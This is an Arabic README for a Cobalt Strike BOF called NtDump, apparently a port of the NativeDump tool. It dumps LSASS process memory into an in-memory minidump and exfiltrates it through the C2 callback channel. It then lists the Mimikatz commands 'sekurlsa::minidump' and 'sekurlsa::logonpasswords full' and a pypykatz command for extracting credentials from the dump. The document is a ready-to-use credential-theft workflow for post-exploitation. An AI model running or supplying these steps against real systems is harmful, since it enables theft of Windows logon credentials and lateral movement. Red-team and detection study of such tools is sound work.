
Cobalt Strike BOF ينشئ تفريغًا مصغّرًا (minidump) لذاكرة LSASS في الذاكرة ويستخرجه عبر استدعاء C2 لتحليل بيانات الاعتماد دون اتصال باستخدام Mimikatz أو pypykatz.
نسخة BOF من الأداة https://github.com/ricardojoserf/NativeDump التي كتبها @ricardojoserf.
استورد NtDump.cna ثم شغّل:
ntdump <filename>
سيتم إنشاء ملف minidump في الذاكرة وتنزيله باستخدام CALLBACK_FILE و CALLBACK_FILE_WRITE. بعد التنزيل، سيظهر الملف في View -> Download.
يمكن تحليله لاحقًا باستخدام Mimikatz
mimikatz # sekurlsa::minidump <file path to downloaded minidump file>
mimikatz # sekurlsa::logonpasswords full
أو باستخدام pypykatz
pypykatz lsa minidump <file path to downloaded minidump file>